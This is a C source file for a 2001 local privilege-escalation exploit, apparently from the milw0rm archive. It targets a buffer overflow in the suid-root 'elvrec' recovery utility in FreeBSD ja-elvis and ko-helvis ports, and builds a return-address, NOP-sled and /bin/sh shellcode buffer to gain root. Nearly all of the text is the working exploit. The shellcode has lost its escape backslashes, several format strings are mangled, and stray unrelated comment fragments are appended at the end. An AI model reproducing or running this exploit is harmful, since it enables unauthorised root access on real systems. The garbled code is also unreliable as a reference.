/*
* ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
*
* vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
*
* The above two packages contain a file recovery utility 'elvrec', installed
* suid root(4755) by default. The utility is subject to a buffer overflow
* leading to root privileges:
*
* Usage: ./elvwreck <offset> <alignment>
*
* [email protected] // www.synnergy.net
* 28 Feb 2001.
*
*/
#include <stdio.h>
#include <stdlib.h>
#define PROG "/usr/local/bin/elvrec"
#define VULN 608
#define BSIZE 1024
#define NOP 0x90
#define ESP 0xbfbff92c // FreeBSD 4.2
#define OFFSET 0
#define EATME 1 // byte alignment
char shellcode[]=
"xebx37x5ex31xc0x88x46xfax89x46xf5x89x36x89x76"
"x04x89x76x08x83x06x10x83x46x04x18x83x46x08x1b"
"x89x46x0cx88x46x17x88x46x1ax88x46x1dx50x56xff"
"x36xb0x3bx50x90x9ax01x01x01x01x07x07xe8xc4xff"
"xffxffx02x02x02x02x02x02x02x02x02x02x02x02x02"
"x02x02x02/bin/sh.-c.sh";
int main(int argc, char *argv[]) {
char buffer[BSIZE];
long address=ESP;
int i, offset, align;
if(argc > 1) { offset = atoi(argv[1]); align = atoi(argv[2]); }
else { offset = OFFSET; align = EATME; }
address += offset;
fprintf(stderr, "n* using ret %#x -> align %d -> offset %dnn", address, align, offset);
for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
for(i=VULN; i<(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
memcpy(buffer+i, shellcode, strlen(shellcode));
buffer[BSIZE] = ' ';
if(execlp(PROG, "elvrec", buffer, 0)) {
fprintf(stderr, "Unable to execute %snn", PROG);
exit(1);
}
}
// milw0rm.com [2001-03-03]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666